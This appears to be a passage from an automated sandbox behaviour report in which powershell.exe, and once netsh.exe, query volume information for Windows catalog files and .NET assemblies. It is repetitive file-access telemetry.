            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
